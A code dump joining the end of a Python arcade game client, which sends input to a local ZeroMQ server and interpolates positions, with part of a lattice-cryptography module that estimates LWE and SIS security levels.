        self.keys_pressed = KeysPressed()
        arcade.set_background_color(arcade.color.GRAY)
        # Local player rectangle; drawn as an outline (filled=False below).
        self.player = Rectangle(
            0, 0, RECT_WIDTH, RECT_HEIGHT, 0, arcade.color.GREEN_YELLOW)
        # Position the player was rendered at when the latest snapshot arrived;
        # used as the interpolation start point in update().
        self.player_position_snapshot = copy.copy(self.player.position)
        self.player.filled = False
        # Ghost shows the raw latest server position for visual comparison.
        self.ghost = Rectangle(
            0, 0, RECT_WIDTH, RECT_HEIGHT, 0, arcade.color.BLACK)
        self.player_event = PlayerEvent()
        self.game_state = GameState(
            player_states=[
                PlayerState()
            ],
            game_seconds=0
        )
        # Recent (position, timestamp) samples received from the server.
        self.position_buffer = deque(maxlen=3)
        # Seconds elapsed since the most recent server snapshot (reset by
        # the network thread in receive_game_state).
        self.t = 0
    def setup(self):
        # Start both rectangles at the screen center.
        x = SCREEN_WIDTH // 2
        y = SCREEN_HEIGHT // 2
        self.player.position += Vec2d(x, y)
        self.ghost.position += Vec2d(x, y)
    def lerp(self, v0: float, v1: float, t: float):
        """ L-inear int-ERP-olation"""
        return (1 - t) * v0 + t * v1
    def update(self, dt):
        # Now calculate the new position based on the server information
        if len(self.position_buffer) < 2:
            # Need at least two snapshots before we can interpolate.
            return
        # These are the last two positions. p1 is the latest, p0 is the
        # one immediately preceding it.
        p0, t0 = self.position_buffer[0]
        p1, t1 = self.position_buffer[1]
        dtt = t1 - t0
        if dtt == 0:
            # Identical timestamps: velocity is undefined, skip this frame.
            return
        # Calculate a PREDICTED future position, based on these two.
        velocity = (p1 - p0) / dtt
        # predicted position
        predicted_position = velocity * dtt + p1
        # Fraction of the snapshot interval elapsed since the last snapshot.
        x = (self.t - 0) / dtt
        x = min(x, 1)
        interp_position = self.lerp(
            self.player_position_snapshot, predicted_position, x
        )
        self.player.position = interp_position
        # self.player.position = p1
        self.ghost.position = p1
        self.t += dt
    def on_draw(self):
        arcade.start_render()
        self.ghost.draw()
        self.player.draw()
    def on_key_press(self, key, modifiers):
        # self.player.movement[key] = MOVE_MAP[key] * MOVEMENT_SPEED
        logger.debug(key)
        # Record the key both for the outgoing network event and locally.
        self.player_event.keys[key] = True
        self.keys_pressed.keys[key] = True
    def on_key_release(self, key, modifiers):
        # del self.player.movement[key]
        self.player_event.keys[key] = False
        self.keys_pressed.keys[key] = False
async def thread_main(window: MyGame, loop):
    """Network loop: push local input to the server and receive game state.

    Runs on a dedicated thread's event loop (see thread_worker); ``window``
    is shared with the arcade UI thread.
    """
    ctx = Context()
    # SUB socket: receives game-state broadcasts from the server.
    sub_sock: Socket = ctx.socket(zmq.SUB)
    sub_sock.connect('tcp://localhost:25000')
    sub_sock.subscribe('')
    # PUSH socket: sends this player's input events to the server.
    push_sock: Socket = ctx.socket(zmq.PUSH)
    push_sock.connect('tcp://localhost:25001')
    async def pusher():
        """Push the player's INPUT state UPDATE_TICK times per second"""
        while True:
            d = window.player_event.asdict()
            msg = dict(counter=1, event=d)
            await push_sock.send_json(msg)
            await asyncio.sleep(1 / UPDATE_TICK)
    async def receive_game_state():
        # Apply each server snapshot to the shared window state.
        while True:
            gs_string = await sub_sock.recv_string()
            # logger.debug('.', end='', flush=True)
            window.game_state.from_json(gs_string)
            ps = window.game_state.player_states[0]
            t = time.time()
            window.position_buffer.append(
                (Vec2d(ps.x, ps.y), t)
            )
            # Reset the interpolation clock and remember where the player
            # was rendered when this snapshot arrived (see MyGame.update).
            window.t = 0
            window.player_position_snapshot = copy.copy(window.player.position)
    try:
        await asyncio.gather(pusher(), receive_game_state())
    finally:
        # Close with a short linger so pending messages don't block shutdown.
        sub_sock.close(1)
        push_sock.close(1)
        ctx.destroy(linger=1)
def thread_worker(window: MyGame):
    """Entry point for the network thread: run thread_main on a fresh event loop."""
    event_loop = asyncio.new_event_loop()
    asyncio.set_event_loop(event_loop)
    event_loop.create_task(thread_main(window, event_loop))
    event_loop.run_forever()
def main():
    """Create the game window, start the networking thread, and run arcade."""
    game_window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
    game_window.setup()
    # Daemon thread: exits automatically when the arcade main loop ends.
    network_thread = threading.Thread(
        target=thread_worker, args=(game_window,), daemon=True)
    network_thread.start()
    arcade.run()
if __name__ == "__main__":
main()
|
problem.py | r"""
Module containing problem classes for SIS and LWE and their ring and module variants, as well as statistically secure variants, where applicable. In addition, the module contains estimate functions to estimate the security of parameter problems and estimate result classes to encapsulate return values for cost estimates.
"""
from . import distributions
from . import algorithms
from . import norm
from abc import ABC, abstractmethod
from typing import Iterable, List
import time
import os
import logging
import traceback
import multiprocessing as mp
from queue import Empty
from functools import partial
import json
import sage.all
from sage.functions.log import log
from sage.functions.other import sqrt
from sage.rings.all import RR
from sage.symbolic.all import pi, e
from sage.misc.functional import round
import estimator as est
oo = est.PlusInfinity()
## Logging ##
logger = logging.getLogger(__name__)
# info about running algorithms and results
alg_logger = logging.getLogger(logger.name + ".estimation_logging")
# exceptions from estimator
alg_exception_logger = logging.getLogger(logger.name + ".estimation_exception_logging")
## Configuration ##
ERROR_HANDLING_ON = True # if True try to deal with errors and not raise exceptions
REDUCE_PROBLEMS = True
## Helper Classes ##
class EmptyProblem(Exception):
    """Raised when no problem instances or estimate algorithms are available."""
    pass
class AllFailedError(Exception):
    """Raised when every estimate algorithm failed to produce a result."""
    pass
class BaseProblem:
    # Forward declaration so that type hints earlier in the module's flow can
    # reference BaseProblem; the real ABC of the same name is defined later.
    pass
## Helper class
class AlgorithmResult:
    """
    Encapsulates a single algorithm's cost estimate for one problem instance.
    """

    def __init__(
        self,
        runtime,
        problem_instance,
        params,
        alg_name,
        c_name="",
        # NOTE: default argument is evaluated once at class-definition time
        # and therefore shared between calls; callers must not mutate it.
        cost=est.Cost([("rop", oo)]),
        is_successful=True,
        error=None,
        is_insecure=False,
    ):
        """
        :param runtime: runtime [s]
        :param problem_instance: label of problem instance
        :param params: dict of input parameters for algorithm
        :param alg_name: name of algorithm
        :param c_name: name of cost model
        :param cost: cost dict (:py:mod:`lattice_parameter_estimation.estimator.estimator.Cost` from LWE Estimator)
        :param is_successful: ``True`` if algorithm was successful
        :param error: string with error description
        :param is_insecure: must be ``True`` if found cost estimate violates security requirement
        """
        self.runtime = runtime
        self.problem_instance = problem_instance
        self.params = params
        self.alg_name = alg_name
        self.c_name = c_name
        self.cost = cost
        self.is_successful = is_successful
        self.error = error
        self.is_insecure = is_insecure

    def to_dict(self):
        """
        :returns: JSON-serializable dict
        """
        params = {}
        for key, value in self.params.items():
            # Cast numeric (e.g. Sage) values to float for JSON; keep values
            # that are not float-convertible (e.g. strings) unchanged.
            try:
                params[key] = float(value)
            except (TypeError, ValueError):
                params[key] = value
        return {
            "inst": self.problem_instance,
            "alg_name": self.alg_name,
            "cost_model": self.c_name,
            "params": params,
            # security in bits: log2 of the rop count, clamped at 0
            "sec": max(0, float(log(abs(self.cost["rop"]), 2).n())),
            "cost": str(self.cost),
            "runtime": self.runtime,
            "is_successful": self.is_successful,
            "is_insecure": self.is_insecure,
            "error": self.error,
        }

    def __bool__(self):
        """``True`` if the estimate did not violate the security requirement.

        BUGFIX: the original returned the nonexistent attribute
        ``self.is_secure`` and therefore always raised ``AttributeError``.
        """
        return not self.is_insecure

    def __str__(self) -> str:
        ret = self.str_no_err()
        if self.error is not None:
            ret += f"\nError: {self.error}"
        return ret

    def str_no_err(self) -> str:
        """
        :returns: string without error message.
        """
        if not self.is_successful:
            # BUGFIX: "insuccessful" typo corrected in the status message.
            detail = f"unsuccessful (took {str(self.runtime)}s) \n\tparams: {str(self.params)}"
        else:
            sec = max(0, float(log(abs(self.cost["rop"]), 2).n()))
            detail = f'{["secure", "insecure"][self.is_insecure]} (took {self.runtime:.1f}s): \n\tsec: {str(sec)}\n\tparams: {str(self.params)}'
        return (
            f'\n\tEstimate for "{self.alg_name}"{["", " " + self.c_name][self.c_name != ""]} - {self.problem_instance} '
            + detail
        )
class AggregateEstimationResult:
    """
    Encapsulates aggregation of estimate results and automates ``is_secure``-check according to specified security strategy in ``config``.
    """

    def __init__(
        self,
        config: algorithms.Configuration,
        error="all_failed",
        runtime=0,
        problem_instances: List[BaseProblem] = None,
    ):
        """
        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :param error: set to ``"all_failed"`` if no algorithm passes, can also be ``"timeout"`` and ``"early_termination"``
        :param runtime: total runtime of algorithms run during estimation
        :param problem_instances: pre-defined list of all problem instances (e.g. instance of :class:`MLWE`) for which estimates are run (used to check if result is secure, if not specified the list is dynamically created when results are added)
        :ivar error: error message
        :ivar is_insecure: ``True`` if aggregate result is insecure
        :ivar lowest_sec: lowest found security estimate
        :ivar runtime: total runtime
        """
        # BUGFIX: the parameter previously defaulted to a shared mutable
        # list ([]); None is used as a sentinel instead.
        if problem_instances is None:
            problem_instances = []
        self.error = error
        self.is_insecure = False
        self.lowest_sec = oo
        # Maps problem-instance label -> list of AlgorithmResult.
        self.alg_res_dict = {}
        for inst in problem_instances:
            self.alg_res_dict[inst] = []
        self.runtime = runtime
        self.config = config
        self._contains_res = False

    def add_algorithm_result(self, algorithm_result: AlgorithmResult):
        """
        Adds algorithm result and automatically updates ``is_insecure``, ``error``, and ``lowest_sec`` instance variables.

        :param algorithm_result: instance of :class:`AlgorithmResult`
        """
        self._contains_res = True
        if algorithm_result.is_insecure:
            self.is_insecure = True
            self.error = algorithm_result.error  # "early_termination" or "timeout"
        if algorithm_result.is_successful:
            self.error = None
            if algorithm_result.cost is not None:
                new_sec = max(
                    0, log(abs(algorithm_result.cost["rop"]), 2).n()
                )  # make sure this does not raise an exception
                if new_sec <= self.lowest_sec:
                    self.lowest_sec = new_sec
        if algorithm_result.problem_instance not in self.alg_res_dict:
            self.alg_res_dict[algorithm_result.problem_instance] = []
        self.alg_res_dict[algorithm_result.problem_instance].append(algorithm_result)

    def add_aggragate_result(self, aggregate_result):
        """
        Adds aggregate result and automatically updates ``is_insecure``, ``error``, and ``lowest_sec`` instance variables.

        .. note:: The method name keeps its historical misspelling
           ("aggragate") for backward compatibility with existing callers.

        :param aggregate_result: instance of :class:`AggregateEstimationResult`
        """
        if not aggregate_result.is_secure():
            self.is_insecure = True
            if (
                aggregate_result.error != "all_failed"
            ):  # => error is "early_termination" or "timeout"
                self.error = aggregate_result.error
        if aggregate_result.lowest_sec < self.lowest_sec:
            self.lowest_sec = aggregate_result.lowest_sec
        for inst in aggregate_result.alg_res_dict:
            if inst not in self.alg_res_dict:
                self.alg_res_dict[inst] = []
            self.alg_res_dict[inst].extend(aggregate_result.alg_res_dict[inst])

    def get_algorithm_result_dict(
        self, sort_by_rop=False, only_best_per_algorithm=False, only_successful=False
    ):
        """
        Returns dict that for each problem instance contains a list of estimation results corresponding to an algorithm and (not in all cases) a cost model.

        .. note:: When no filter/sort option is set, the returned lists are
           references to this object's internal lists, not copies.

        :param sort_by_rop: if ``True`` list is sorted in ascending order by rop
        :param only_best_per_algorithm: if ``True`` only the best result for each algorithm is returned
        :param only_successful: only return estimate results for successful algorithms
        """
        if not self._contains_res:
            return self.alg_res_dict
        result_dict = {}
        for inst in self.alg_res_dict:
            result_dict[inst] = self.alg_res_dict[inst]
            if only_successful:
                result_dict[inst] = [x for x in result_dict[inst] if x.is_successful]
            if only_best_per_algorithm:
                # Group results by algorithm name, keep the cheapest of each.
                alg_names = set()
                for alg_res in result_dict[inst]:
                    alg_names.add(alg_res.alg_name)
                best_results = {}
                for alg_name in alg_names:
                    best_results[alg_name] = min(
                        [x for x in result_dict[inst] if x.alg_name == alg_name],
                        key=lambda x: x.cost["rop"],
                    )
                result_dict[inst] = list(best_results.values())
            if sort_by_rop:
                result_dict[inst] = sorted(
                    result_dict[inst], key=lambda x: x.cost["rop"]
                )
        return result_dict

    def is_secure(self):
        """
        Returns ``True`` if secure according to security strategy in config
        """
        if self.is_insecure:
            return False
        for inst in self.alg_res_dict:
            if not self.alg_res_dict[inst]:
                # No results for this instance => cannot claim security.
                return False
            if self.config.security_strategy == algorithms.ALL_SECURE:
                # TODO: x.is_insecure should not be necessary
                if not all([x.is_successful for x in self.alg_res_dict[inst]]):
                    return False
            elif self.config.security_strategy == algorithms.SOME_SECURE:
                if not any([x.is_successful for x in self.alg_res_dict[inst]]):
                    return False
            elif not self.config.security_strategy == algorithms.NOT_INSECURE:
                raise ValueError("Security strategy in config improperly configured.")
        return True

    def to_dict(
        self, sort_by_rop=False, only_best_per_algorithm=False, only_successful=False
    ):
        """
        Returns results in JSON-serializable dict.

        :param sort_by_rop: if ``True`` list is sorted in ascending order by rop
        :param only_best_per_algorithm: if ``True`` only the best result for each algorithm is returned
        :param only_successful: only return estimate results for successful algorithms
        """
        alg_result_dict = {}
        former_dict = self.get_algorithm_result_dict(
            sort_by_rop=sort_by_rop,
            only_best_per_algorithm=only_best_per_algorithm,
            only_successful=only_successful,
        )
        for inst in former_dict:
            alg_result_dict[inst] = [x.to_dict() for x in former_dict[inst]]
        res = {
            "alg_results": alg_result_dict,
            "error": self.error,
            "is_insecure": self.is_insecure,
            "lowest_sec": max(0, float(self.lowest_sec)),
            "runtime": self.runtime,
        }
        return res

    def save_as_JSON(
        self,
        filename,
        sort_by_rop=False,
        only_best_per_algorithm=False,
        only_successful=False,
    ):
        """
        Save results in file.

        :param filename: filename (".json" is appended)
        :param sort_by_rop: if ``True`` list is sorted in ascending order by rop
        :param only_best_per_algorithm: if ``True`` only the best result for each algorithm is returned
        :param only_successful: only return estimate results for successful algorithms
        """
        with open(filename + ".json", "w") as fout:
            json.dump(
                self.to_dict(
                    sort_by_rop=sort_by_rop,
                    only_best_per_algorithm=only_best_per_algorithm,
                    only_successful=only_successful,
                ),
                fout,
                indent=4,
            )

    def __bool__(self):
        """
        Calls :meth:`is_secure`.
        """
        return self.is_secure()

    def __str__(self) -> str:
        error = ", Error: " + self.error if self.error is not None else ""
        return (
            f'Estimates successful and {["insecure", "secure"][self.is_secure()]}'
            + f" (took {self.runtime:.1f}s):"
            + f" best sec={str(self.lowest_sec)}"
            + error
        )
class BaseProblem(ABC):
    """Abstract base class for parameter problems (LWE/SIS and their variants).

    Rich comparisons against an integer security level run a full estimate
    with a default :class:`algorithms.Configuration`: ``problem >= sec`` and
    ``problem > sec`` return an :class:`AggregateEstimationResult` (truthy
    when the problem is sufficiently secure), while ``<`` and ``<=`` return
    plain booleans (their negations).
    """

    @abstractmethod
    def __init__(self):
        pass

    @abstractmethod
    def get_estimate_algorithms(self, config=None):
        """Return the list of estimate-algorithm descriptors for this problem."""
        pass

    # TODO: check, perhaps add other operators
    def __ge__(self, sec) -> AggregateEstimationResult:
        config = algorithms.Configuration()  # use default config
        # BUGFIX: the keyword was misspelled "parameter_problem", which made
        # every comparison raise TypeError (estimate() has no such parameter).
        return estimate(parameter_problems=[self], config=config, sec=sec)

    def __gt__(self, sec) -> AggregateEstimationResult:
        config = algorithms.Configuration()  # use default config
        return estimate(parameter_problems=[self], config=config, sec=sec + 1)

    def __lt__(self, sec) -> bool:
        # Negating the aggregate result's truth value yields a bool.
        return not self.__ge__(sec)

    def __le__(self, sec) -> bool:
        return not self.__gt__(sec)

    @abstractmethod
    def __str__(self):
        pass
def reduce_parameter_problems(
    parameter_problems: Iterable[BaseProblem], config: algorithms.Configuration
) -> List[BaseProblem]:
    """
    Reduce iterable of parameter problems to easiest versions of SIS and LWE respectively according to the following hardness rules:

    For LWE, we have that the larger ``n`` and ``alpha`` are and the smaller ``q`` and ``m`` are, the harder the problem becomes. For SIS, the problem becomes harder for increasing ``n`` and ``q`` and decreasing ``beta`` and ``m``.

    Two problem instances might not be comparable with the above rules, hence the reduction is incomplete.

    :param parameter_problems: iterable over instances of :class:`BaseProblem`
    :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
    :returns: list of the (possibly fewer) easiest problem instances
    """
    if not isinstance(config, algorithms.Configuration):
        raise ValueError("config must be instance of algorithms.Configuration")
    parameter_problems = list(parameter_problems)
    if not REDUCE_PROBLEMS:
        return parameter_problems
    lwe_problems = [
        prob.to_LWE() for prob in parameter_problems if isinstance(prob, LWE)
    ]
    sis_problems = [
        prob.to_SIS() for prob in parameter_problems if isinstance(prob, SIS)
    ]

    def _easier_lwe(a: LWE, b: LWE) -> bool:
        # a is at most as hard as b if its dimension and noise rate are not
        # larger while its modulus and sample count are not smaller.
        if (
            a.n <= b.n
            and a.q >= b.q
            and a.error_distribution.get_alpha(q=a.q, n=a.n)
            <= b.error_distribution.get_alpha(q=b.q, n=b.n)
            and a.m >= b.m
        ):
            return True
        return (
            False  # does not mean that it is harder, maybe instances cannot be compared
        )

    def _easier_sis(a: SIS, b: SIS) -> bool:
        # Compare the norms actually needed by the configured algorithms.
        # BUGFIX: the original computed
        #   algorithms.REDUCTION or algorithms.REDUCTION_RS in config.algorithms
        # which, by operator precedence, OR-ed the (truthy) REDUCTION constant
        # with a membership test instead of testing both memberships.
        test_L2 = (
            algorithms.REDUCTION in config.algorithms
            or algorithms.REDUCTION_RS in config.algorithms
        )
        test_Loo = algorithms.COMBINATORIAL in config.algorithms
        if not test_L2 and not test_Loo:
            # BUGFIX: previously is_larger_bound stayed unbound here and the
            # comparison below raised NameError; without a relevant norm the
            # instances are treated as incomparable.
            return False
        is_larger_bound = True
        if test_L2:
            is_larger_bound = a.bound.to_L2(a.n).value >= b.bound.to_L2(b.n).value
        if test_Loo:
            is_larger_bound_Loo = a.bound.to_Loo(a.n).value >= b.bound.to_Loo(b.n).value
            if test_L2:
                is_larger_bound = is_larger_bound and is_larger_bound_Loo
            else:
                is_larger_bound = is_larger_bound_Loo
        if a.n <= b.n and a.q <= b.q and is_larger_bound and a.m >= b.m:
            return True
        return (
            False  # does not mean that it is harder, maybe instances cannot be compared
        )

    lwe_set = set()
    for prob in lwe_problems:
        # determine easiest problem relative to prob (there may be different problems that can't be compared)
        easiest_prob = prob
        for cmp_prob in lwe_problems:
            if _easier_lwe(cmp_prob, easiest_prob):
                easiest_prob = cmp_prob
        lwe_set.add(easiest_prob)
    sis_set = set()
    for prob in sis_problems:
        # determine easiest problem relative to prob (there may be different problems that can't be compared)
        easiest_prob = prob
        for cmp_prob in sis_problems:
            if _easier_sis(cmp_prob, easiest_prob):
                easiest_prob = cmp_prob
        sis_set.add(easiest_prob)
    return list(lwe_set | sis_set)
## Estimation ##
def algorithms_executor(
    algs, config: algorithms.Configuration, sec=None, res_queue=None
):
    """Executes list of estimate algorithms in ``algs``. Results are written in ``res_queue`` as instances of :class:`AlgorithmResult` if set (in parallel execution).

    :param algs: list of tuples as ``[(problem_instance, alg)]``, where alg is dict as ``{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "LWE"}`` (item in list returned from :meth:`BaseProblem.get_estimate_algorithms`)
    :param sec: bit security parameter
    :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
    :param res_queue: for multiprocessing support, instance of :py:mod:`multiprocessing.Queue`
    :returns: ``None`` if res_queue is set, else an instance of :class:`AggregateEstimationResult`
    """
    if not isinstance(config, algorithms.Configuration):
        raise ValueError("config must be instance of algorithms.Configuration")

    def conversion(k, v):
        # Sage/estimator values such as alpha are cast to float so that they
        # are loggable and JSON-friendly; everything else is kept as-is.
        if k in ["alpha"]:
            return k, float(v)
        else:
            return k, v

    start = time.time()
    # BUGFIX: a dead "results = AggregateEstimationResult(config=config)" that
    # was immediately overwritten by the list below has been removed.
    results = []
    early_termination = False
    timeout = False
    for alg_tuple in algs:
        if (
            time.time() - start > config.timeout
        ):  # won't prevent algorithm from looping infinitively
            timeout = True
            break
        # alg_tuple is tuple (problem_instance, alg)
        inst, alg = alg_tuple
        algf = alg["algf"]
        params = dict(
            [
                conversion(k, algf.keywords[k])
                for k in ["secret_distribution", "n", "m", "q", "alpha", "bound"]
                if k in set(algf.keywords)
            ]
        )
        cname = f'({alg["cname"]})' if alg["cname"] != "" else ""
        alg_logger.info(
            str(os.getpid())
            + f' Running algorithm {alg["algname"]} {cname}... Parameters: {str(params)}'
        )
        start_alg = time.time()
        cost = est.Cost([("rop", oo)])  # else finding best doesn't work
        error = None
        # TODO: could be encapsulated in AlgorithmResult
        is_insecure = False
        is_successful = False
        try:
            cost = algf()
            if cost is None:
                cost = est.Cost([("rop", oo)])
                raise RuntimeError(
                    "Bug in estimator (returned None). No solution found."
                )
            if sec and cost["rop"] < 2 ** sec:
                is_insecure = True
            is_successful = True
        except algorithms.IntractableSolution:
            # from SIS algorithms
            cost = est.Cost([("rop", oo)])
            is_successful = True
            if sec and cost["rop"] < 2 ** sec:
                is_insecure = True
            error = "intractable"
        except algorithms.TrivialSolution:
            # from SIS algorithms
            cost = est.Cost([("rop", RR(1))])
            if sec and sec > 0:
                is_insecure = True
            is_successful = True
            error = "trivial"
        except Exception:
            # BUGFIX: narrowed from a bare "except:" so KeyboardInterrupt and
            # SystemExit propagate instead of being recorded as failures.
            error = traceback.format_exc()
        runtime = time.time() - start_alg
        alg_res = AlgorithmResult(
            runtime=runtime,
            problem_instance=inst,
            params=params,
            alg_name=alg["algname"],
            c_name=alg["cname"],
            cost=cost,
            is_successful=is_successful,
            error=error,
            is_insecure=is_insecure,
        )
        if not is_successful:
            alg_logger.error(str(alg_res))
        else:
            alg_logger.info(str(alg_res))
        if res_queue is None:
            results.append(alg_res)
        else:
            res_queue.put(alg_res)
        if is_insecure or (
            config.security_strategy == algorithms.ALL_SECURE and not is_successful
        ):
            # early termination
            # BUGFIX: record the early exit; the flag was never set before,
            # so the "early_termination" error below was unreachable.
            early_termination = True
            break
    if res_queue is None:
        # no multiprocessing
        total_runtime = time.time() - start
        agg_result = AggregateEstimationResult(config=config)
        agg_result.runtime = total_runtime
        for alg_res in results:
            agg_result.add_algorithm_result(alg_res)
        if early_termination:  # if all_failed no early termination
            agg_result.error = "early_termination"
        if timeout:
            agg_result.error = "timeout"
        return agg_result
    return True  # TODO try without
def estimate(
    parameter_problems: Iterable[BaseProblem],
    config: algorithms.Configuration,
    sec=None,
) -> AggregateEstimationResult:
    """
    Runs estimates for problem instances in ``parameter_problems``.

    First, the list of problem instances is reduced to the simplest version of LWE and SIS respectively. Then, a list of algorithm instances is created and executed sequentially or concurrently by :meth:`algorithms_executor` according to the configuration in ``config``.

    Estimate logging can be configured in :py:mod:`lattice_parameter_estimation.Logging`.

    :param parameter_problems: iterable over instances of :class:`BaseProblem`. If empty or no algorithms can be created :class:`EmptyProblem` is raised.
    :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
    :param sec: optional bit security parameter. If set, early termination is supported once insecure estimate is found.
    :returns: instance of :class:`AggregateEstimationResult`
    """
    if not isinstance(config, algorithms.Configuration):
        raise ValueError("config must be instance of algorithms.Configuration")
    # Create algorithm list of tuples (problem_instance, alg)
    algs = []
    parameter_problems = reduce_parameter_problems(parameter_problems, config)
    for problem_instance in parameter_problems:
        try:
            inst_algs = problem_instance.get_estimate_algorithms(config=config)
        except NotImplementedError as e:
            if ERROR_HANDLING_ON:
                logger.error(e)
                # BUGFIX: skip this instance. Previously execution fell
                # through with ``inst_algs`` unbound (NameError) or still
                # holding the previous instance's algorithm list.
                continue
            else:
                raise e
        if not inst_algs:
            raise EmptyProblem(
                f"No algorithm for instance {str(problem_instance)}. Perhaps algorithm in Configuration was not set properly."
            )
        for alg in inst_algs:
            algs.append(
                (problem_instance.label, alg)
            )  # TODO maybe find better description for inst or change __str__
    if not algs:  # no instance
        raise EmptyProblem("Could not find any algorithms for given input parameters.")
    # sort first by algorithm priority, then by cost model priority
    algs = sorted(algs, key=lambda a: (a[1]["prio"], a[1]["cprio"]))
    start = time.time()
    if not config.parallel:
        num_procs = 1  # needed to terminate infinite loops
    elif config.num_cpus is None:
        num_procs = min(mp.cpu_count(), len(algs))
    else:
        num_procs = config.num_cpus
    # evenly distribute algorithms according to sorting among #NUM_CPUS lists
    split_list = num_procs * [None]
    for j in range(num_procs):
        split_list[j] = []
    for i in range(len(algs)):
        split_list[i % num_procs].append(algs[i])
    alg_logger.debug(f"Starting {num_procs} processes for {len(algs)} algorithms...")
    alg_logger.debug(
        "Running estimates " + ["without", "with"][bool(sec)] + " early termination..."
    )
    p = [None] * len(split_list)
    results = AggregateEstimationResult(
        config=config, problem_instances=[x.label for x in parameter_problems]
    )
    result_queue = mp.Queue()
    for i in range(len(split_list)):
        # TODO: a Pool.apply_async-based version was attempted but not working;
        # plain Process objects are used so they can be terminate()d early.
        p[i] = mp.Process(
            target=algorithms_executor, args=(split_list[i], config, sec, result_queue)
        )
        p[i].start()
        alg_logger.debug(str(p[i].pid) + " started...")
    terminated = False
    while not terminated:
        try:
            # Check if all processes finished their calculation
            all_done = True
            for i in range(len(split_list)):
                if p[i].is_alive():
                    all_done = False
                    break
            if all_done:
                for i in range(len(split_list)):
                    p[i].join()
                result_queue.close()
                terminated = True
                break
            # Try to get result
            alg_res = result_queue.get(
                block=True, timeout=0.5
            )  # timeout necessary as process that wrote result in queue may still be alive in the above check
            results.add_algorithm_result(alg_res)
            if (
                sec and results.is_insecure
            ):  # is_secure may not be right as tests not complete
                alg_logger.debug(
                    "Received insecure result. Terminate all other processes."
                )
                # insecure result obtained => terminate all other processes
                results.error = "early_termination"
                for i in range(len(split_list)):
                    p[i].terminate()
                    p[i].join()
                # data put into queue during terminate may become corrupted => just close it
                result_queue.close()
                terminated = True
        except Empty:  # result not yet available
            if time.time() - start > config.timeout:
                # Computation too long, result not expected anymore
                for i in range(len(split_list)):
                    p[i].terminate()
                    p[i].join()
                result_queue.close()
                terminated = True
                if sec and results.is_secure():
                    if config.security_strategy == algorithms.ALL_SECURE:
                        # since at least one is not successful => ALL_SECURE = FALSE
                        results.is_insecure = True
                results.error = "timeout"
                message = f"Timeout during estimation after {config.timeout}s. Try to specify longer timeout in config. If no result is obtained, one of the algorithms might not terminate for the given parameter set."
                if not results.is_secure():
                    raise TimeoutError(message)
    if results.error == "all_failed":  # TODO: don't raise exception
        raise AllFailedError("All estimate algorithms failed")
    runtime = time.time() - start
    results.runtime = runtime
    alg_logger.info(str(results))
    return results
## LWE and its variants ##
class LWE(BaseProblem):
    """
    Learning with Errors (LWE) problem class used to create a list of algorithms from the LWE Estimator :cite:`APS15` for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("LWE1", "LWE2", ...).
    _counter = 1

    def __init__(
        self,
        n,
        q,
        m,
        secret_distribution: distributions.Distribution,
        error_distribution: distributions.Distribution,
        variant="LWE",
        label=None,
    ):
        """
        :param q: modulus
        :param n: secret dimension
        :param m: number of samples
        :param secret_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param error_distribution: error distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not q or not m or n < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance: ``self._counter += 1``
            # would only create an instance attribute, so the shared counter
            # would never advance and every instance would get the same label.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        self.n = n
        self.q = q
        self.m = m
        self.secret_distribution = secret_distribution
        self.error_distribution = error_distribution

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions from the LWE Estimator :cite:`APS15` on the LWE instance according to the attack configuration.

        The priorities are assigned as follows:

        .. list-table:: Algorithm Priorities
            :header-rows: 1

            * - Algorithm
              - Priority
              - Comment
            * - mitm
              - 5
              - fastest, high cost estimate, as prefilter
            * - primal-usvp
              - 10
              - fast, low cost estimates
            * - dual
              - 20
              - fast, estimates may be slightly higher than primal-usvp
            * - dual-no-lll
              - 30
              - fast, estimates may be slightly higher than dual
            * - bkw-coded
              - 90
              - slow, sometimes very low cost estimate (for small stddev), does not always yield results
            * - primal-decode
              - 100
              - slow, estimates often higher than faster algorithms
            * - arora-gb
              - 200
              - extremely slow, often higher estimates, does not always yield results

        .. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_Regev_long.png
            :align: center
            :figclass: align-center

            LWE instance with parameters as in :cite:`Reg05`

        .. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_Regev_long_small_n.png
            :align: center
            :figclass: align-center

            LWE instance with parameters as in :cite:`Reg05` for small :math:`n`

        .. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_long_small.png
            :align: center
            :figclass: align-center

            LWE instance with :math:`\sigma=2.828,\; m=\infty, \; n < q < 2n`

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "LWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime) and "cprio" of the cost model, with lower expected cost estimate for lower priorities
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")

        secret_distribution = self.secret_distribution._convert_for_lwe_estimator()
        alpha = RR(self.error_distribution.get_alpha(q=self.q, n=self.n))
        # TODO: if secret is normal, but doesn't follow noise distribution, not supported by estimator => convert to uniform?
        if (
            secret_distribution == "normal"
            and self.secret_distribution.get_alpha(q=self.q, n=self.n) != alpha
        ):
            raise NotImplementedError(
                "If secret distribution is Gaussian it must follow the error distribution. Differing Gaussians not supported by LWE Estimator at the moment."
            )  # TODO: perhaps change

        cost_models = config.reduction_cost_models()
